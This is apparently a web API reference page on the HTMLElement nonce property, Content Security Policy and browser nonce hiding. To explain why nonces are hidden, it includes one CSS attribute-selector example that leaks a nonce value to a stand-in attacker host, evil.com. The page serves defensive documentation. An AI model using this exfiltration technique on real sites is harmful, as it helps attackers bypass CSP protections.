Thenonce property of theHTMLElement interface returns the cryptographic number used once that is used byContent Security Policy to determine whether a given fetch will be allowed to proceed.

In later implementations, elements only expose theirnonce attribute to scripts (and not to side-channels like CSS attribute selectors).

Examples

Retrieving a nonce value

In the past, not all browsers supported thenonce IDL attribute, so a workaround is to try to usegetAttribute as a fallback:

let nonce = script["nonce"] || script.getAttribute("nonce");

However, recent browsers version hidenonce values that are accessed this way (an empty string will be returned). The IDL property (script['nonce']) will be the only way to access nonces.

Nonce hiding helps prevent attackers from exfiltrating nonce data via mechanisms that can grab data from content attributes like this CSS selector:

script[nonce~="whatever"] {  background: url("https://evil.com/nonce?whatever");}

Specifications

Browser compatibility

See also

• nonce global attribute
• Content Security Policy
• CSP:script-src